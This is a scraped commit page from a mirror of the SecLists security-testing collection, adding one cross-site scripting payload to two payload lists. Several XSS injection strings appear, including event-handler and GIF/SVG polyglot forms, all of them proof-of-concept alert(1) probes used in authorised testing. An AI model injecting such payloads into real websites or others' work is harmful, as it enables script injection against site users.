mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-07-18 17:59:25 -04:00
Added entry from #964
This commit is contained in:
parent
802ec0e9ff
commit
9c8ce30b42
2 changed files with 3 additions and 1 deletions
|
@ -111,3 +111,4 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
||||||
<form onsubmit=alert(1)><input type=submit>
|
<form onsubmit=alert(1)><input type=submit>
|
||||||
<select onchange=alert(1)><option>1<option>2
|
<select onchange=alert(1)><option>1<option>2
|
||||||
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
||||||
|
<Img Src=javascript:alert(1) OnError=location=src>
|
Before Width: | Height: | Size: 4 KiB After Width: | Height: | Size: 4.1 KiB |
|
@ -110,4 +110,5 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
||||||
<keygen autofocus onfocus=alert(1)>
|
<keygen autofocus onfocus=alert(1)>
|
||||||
<form onsubmit=alert(1)><input type=submit>
|
<form onsubmit=alert(1)><input type=submit>
|
||||||
<select onchange=alert(1)><option>1<option>2
|
<select onchange=alert(1)><option>1<option>2
|
||||||
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
||||||
|
<Img Src=javascript:alert(1) OnError=location=src>
|
Before Width: | Height: | Size: 4 KiB After Width: | Height: | Size: 4.1 KiB |
Loading…
Add table
Reference in a new issue